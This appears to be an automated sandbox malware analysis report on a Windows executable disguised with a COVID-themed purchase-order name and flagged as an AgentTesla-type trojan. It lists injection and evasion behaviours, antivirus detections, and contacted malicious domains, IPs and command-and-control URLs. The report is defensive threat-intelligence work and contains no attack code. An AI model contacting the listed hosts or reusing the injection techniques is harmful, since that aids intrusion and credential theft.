          behaviorgraph top1 signatures2 2 Behavior Graph ID: 338985 Sample: Po-covid19 2372#w2..exe Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 38 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 10 other signatures 2->44 10 Po-covid19 2372#w2..exe 3 2->10         started        process3 file4 30 C:\Users\user\...\Po-covid19 2372#w2..exe.log, ASCII 10->30 dropped 54 Injects a PE file into a foreign processes 10->54 14 Po-covid19 2372#w2..exe 10->14         started        17 Po-covid19 2372#w2..exe 10->17         started        signatures5 process6 signatures7 56 Modifies the context of a thread in another process (thread injection) 14->56 58 Maps a DLL or memory area into another process 14->58 60 Sample uses process hollowing technique 14->60 62 Queues an APC in another process (thread injection) 14->62 19 explorer.exe 14->19 injected process8 dnsIp9 32 www.scientificimaginetics.com 154.92.73.140, 49740, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 19->32 34 thesaltlifestyle.com 34.102.136.180, 49736, 80 GOOGLEUS United States 19->34 36 4 other IPs or domains 19->36 46 System process connects to network (likely due to code injection or exploit) 19->46 23 msiexec.exe 19->23         started        signatures10 process11 signatures12 48 Modifies the context of a thread in another process (thread injection) 23->48 50 Maps a DLL or memory area into another process 23->50 52 Tries to detect virtualization through RDTSC time measurements 23->52 26 cmd.exe 1 23->26         started        process13 process14 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Po-covid19 2372#w2..exe27%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          Po-covid19 2372#w2..exe100%AviraHEUR/AGEN.1120329
          Po-covid19 2372#w2..exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.2.Po-covid19 2372#w2..exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.0.Po-covid19 2372#w2..exe.9b0000.0.unpack100%AviraHEUR/AGEN.1120329Download File
          0.0.Po-covid19 2372#w2..exe.70000.0.unpack100%AviraHEUR/AGEN.1120329Download File
          0.2.Po-covid19 2372#w2..exe.70000.0.unpack100%AviraHEUR/AGEN.1134873Download File
          3.2.Po-covid19 2372#w2..exe.9b0000.1.unpack100%AviraHEUR/AGEN.1120329Download File
          2.2.Po-covid19 2372#w2..exe.130000.0.unpack100%AviraHEUR/AGEN.1120329Download File
          2.0.Po-covid19 2372#w2..exe.130000.0.unpack100%AviraHEUR/AGEN.1120329Download File

          Domains

          SourceDetectionScannerLabelLink
          www.johnemotions.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.jiyu-kobo.co.jp/jp/?0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/H0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htmpu0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.fontbureau.comessed0%URL Reputationsafe
          http://www.fontbureau.comessed0%URL Reputationsafe
          http://www.fontbureau.comessed0%URL Reputationsafe
          http://www.founder.com.cn/cn=0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.fontbureau.comnc./S0%Avira URL Cloudsafe
          http://www.thesaltlifestyle.com/p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=BBaWJPlPEO+nvtMqhmqrcRgDtKq1LKrnuc6I0tDI+4mn5icveD46W7DXUUudv5GhOCct0%Avira URL Cloudsafe
          http://www.fontbureau.comalsF0%URL Reputationsafe
          http://www.fontbureau.comalsF0%URL Reputationsafe
          http://www.fontbureau.comalsF0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/-cz0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/ghtsl0%Avira URL Cloudsafe
          https://www.johnemotions.com/p95n/?oH5h=OkCbzDuuF1pG8/0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y0e0%Avira URL Cloudsafe
          http://www.urwpp.de.0%Avira URL Cloudsafe
          http://www.fontbureau.com-0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/.0%Avira URL Cloudsafe
          http://www.fontbureau.com00%Avira URL Cloudsafe
          http://www.fontbureau.comdic0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://crl.;0%Avira URL Cloudsafe
          http://www.fontbureau.comessedZ0%Avira URL Cloudsafe
          http://www.fontbureau.comF&0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.de0%URL Reputationsafe
          http://www.urwpp.de0%URL Reputationsafe
          http://www.urwpp.de0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.fontbureau.com.TTF0%URL Reputationsafe
          http://www.fontbureau.com.TTF0%URL Reputationsafe
          http://www.fontbureau.com.TTF0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/Z0%Avira URL Cloudsafe
          http://www.fontbureau.com=0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/~0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/Z0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/S0%Avira URL Cloudsafe
          http://www.fontbureau.comgritoe0%Avira URL Cloudsafe
          http://www.fontbureau.comaA0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/H0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/H0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/H0%URL Reputationsafe
          http://www.fontbureau.comzana0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/A0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.fontbureau.comd0%URL Reputationsafe
          http://www.fontbureau.comd0%URL Reputationsafe
          http://www.fontbureau.comd0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/?0%Avira URL Cloudsafe
          http://www.urwpp.de3z0%Avira URL Cloudsafe
          http://www.fontbureau.comdl0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.fontbureau.comeH0%Avira URL Cloudsafe
          http://www.urwpp.deXz0%Avira URL Cloudsafe
          http://www.monotype.70%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/w0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.scientificimaginetics.com
          154.92.73.140
          truetrue
            unknown
            thesaltlifestyle.com
            34.102.136.180
            truetrue
              unknown
              www.aduhelmfinancialsupport.com
              165.160.13.20
              truefalse
                high
                www.johnemotions.com
                104.24.109.70
                truetrueunknown
                www.steelyourselfshop.net
                unknown
                unknowntrue
                  unknown
                  www.thesaltlifestyle.com
                  unknown
                  unknowntrue
                    unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.aduhelmfinancialsupport.com/p95n/?oH5h=yIt3vHGcFY19i9LszRbGqv8br4EBNSz7kQseU3pL44UQdgKo/VZu2mbLhFyK51ONzUns&u6ihA=cjlpdRL8ZtfDvB1false
                      high
                      http://www.thesaltlifestyle.com/p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=BBaWJPlPEO+nvtMqhmqrcRgDtKq1LKrnuc6I0tDI+4mn5icveD46W7DXUUudv5GhOCcttrue
                      • Avira URL Cloud: safe
                      unknown
                      http://www.johnemotions.com/p95n/?oH5h=OkCbzDuuF1pG8/+FjCqUEbhCI/Ef9I/I5jzkOiKX/zkELnGsjuBbK/8sh3SawKW3Kze/&u6ihA=cjlpdRL8ZtfDvB1true
                      • Avira URL Cloud: safe
                      unknown
                      http://www.scientificimaginetics.com/p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=gRhj5HMuZvR/Ec7o8oi+HxLziNFcY38IPUSKESyExHr5bx7zEB/jrV73UqEK091YdqI8true
                      • Avira URL Cloud: safe
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.jiyu-kobo.co.jp/jp/?Po-covid19 2372#w2..exe, 00000000.00000003.223340232.000000000791B000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.fontbureau.com/designersGPo-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpfalse
                        high
                        http://www.fontbureau.com/designers/?Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpfalse
                          high
                          http://www.founder.com.cn/cn/bThePo-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designers?Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpfalse
                            high
                            http://www.jiyu-kobo.co.jp/jp/HPo-covid19 2372#w2..exe, 00000000.00000003.223340232.000000000791B000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.galapagosdesign.com/staff/dennis.htmpuPo-covid19 2372#w2..exe, 00000000.00000003.229096001.000000000791B000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.tiro.comexplorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpfalse
                              high
                              http://www.fontbureau.comessedPo-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.founder.com.cn/cn=Po-covid19 2372#w2..exe, 00000000.00000003.221689950.0000000007923000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.goodfont.co.krPo-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.comnc./SPo-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fontbureau.comalsFPo-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/-czPo-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/ghtslPo-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.johnemotions.com/p95n/?oH5h=OkCbzDuuF1pG8/msiexec.exe, 0000000E.00000002.622832165.000000000501F000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.sajatypeworks.comPo-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.typography.netDPo-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.founder.com.cn/cn/cThePo-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.galapagosdesign.com/staff/dennis.htmPo-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://fontfabrik.comPo-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/Y0ePo-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.urwpp.de.Po-covid19 2372#w2..exe, 00000000.00000003.227697228.000000000791B000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fontbureau.com-Po-covid19 2372#w2..exe, 00000000.00000003.226795444.000000000791B000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              low
                              http://www.jiyu-kobo.co.jp/.Po-covid19 2372#w2..exe, 00000000.00000003.222363668.0000000007913000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fontbureau.com0Po-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fontbureau.comdicPo-covid19 2372#w2..exe, 00000000.00000003.226140808.000000000791B000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fontbureau.com/Po-covid19 2372#w2..exe, 00000000.00000003.225390108.000000000791B000.00000004.00000001.sdmpfalse
                                high
                                http://www.galapagosdesign.com/DPleasePo-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://crl.;explorer.exe, 00000004.00000000.281618251.000000000F5C4000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://www.fontbureau.comessedZPo-covid19 2372#w2..exe, 00000000.00000003.225516592.000000000791B000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.fontbureau.comF&Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://www.fonts.comPo-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.sandoll.co.krPo-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.urwpp.deDPleasePo-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.urwpp.dePo-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.zhongyicts.com.cnPo-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.sakkal.comPo-covid19 2372#w2..exe, 00000000.00000003.223340232.000000000791B000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com.TTFPo-covid19 2372#w2..exe, 00000000.00000003.227104715.000000000791B000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp/jp/ZPo-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.fontbureau.com=Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://www.jiyu-kobo.co.jp/jp/~Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp/ZPo-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.apache.org/licenses/LICENSE-2.0Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.fontbureau.comPo-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.galapagosdesign.com/Po-covid19 2372#w2..exe, 00000000.00000003.229096001.000000000791B000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000003.228852233.000000000791B000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000003.228815722.0000000007942000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/SPo-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fontbureau.comgritoePo-covid19 2372#w2..exe, 00000000.00000003.225158941.000000000791B000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fontbureau.comaAPo-covid19 2372#w2..exe, 00000000.00000003.225516592.000000000791B000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/HPo-covid19 2372#w2..exe, 00000000.00000003.222719848.000000000791A000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.comzanaPo-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/APo-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/jp/Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.comdPo-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/?Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.urwpp.de3zPo-covid19 2372#w2..exe, 00000000.00000003.224891432.000000000791B000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fontbureau.comdlPo-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.carterandcone.comlPo-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.comeHPo-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.urwpp.deXzPo-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.monotype.7Po-covid19 2372#w2..exe, 00000000.00000003.225451084.000000000791B000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low
                                      http://www.fontbureau.com/designers/cabarga.htmlNPo-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.jiyu-kobo.co.jp/wPo-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.founder.com.cn/cnPo-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers/frere-jones.htmlPo-covid19 2372#w2..exe, 00000000.00000003.226091255.000000000791B000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.fontbureau.comoituPo-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlPo-covid19 2372#w2..exe, 00000000.00000003.226977608.0000000007942000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000003.226763972.0000000007942000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.fontbureau.comlic0Po-covid19 2372#w2..exe, 00000000.00000003.226795444.000000000791B000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.urwpp.deoPo-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.fontbureau.comdZPo-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.jiyu-kobo.co.jp/Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.jiyu-kobo.co.jp/jp/-Po-covid19 2372#w2..exe, 00000000.00000003.223340232.000000000791B000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.fontbureau.com/designers8Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.fontbureau.com/designers/Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.fontbureau.comowPo-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.founder.com.cn/cn$Po-covid19 2372#w2..exe, 00000000.00000003.221689950.0000000007923000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                154.92.73.140
                                                unknownSeychelles
                                                132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                                34.102.136.180
                                                unknownUnited States
                                                15169GOOGLEUStrue
                                                165.160.13.20
                                                unknownUnited States
                                                19574CSCUSfalse
                                                104.24.109.70
                                                unknownUnited States
                                                13335CLOUDFLARENETUStrue

                                                General Information

                                                Joe Sandbox Version:31.0.0 Red Diamond
                                                Analysis ID:338985
                                                Start date:13.01.2021
                                                Start time:08:49:19
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 11m 45s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:Po-covid19 2372#w2..exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:36
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@9/1@6/4
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 17.4% (good quality ratio 14.6%)
                                                • Quality average: 67.6%
                                                • Quality standard deviation: 35.6%
                                                HCA Information:
                                                • Successful, ratio: 96%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
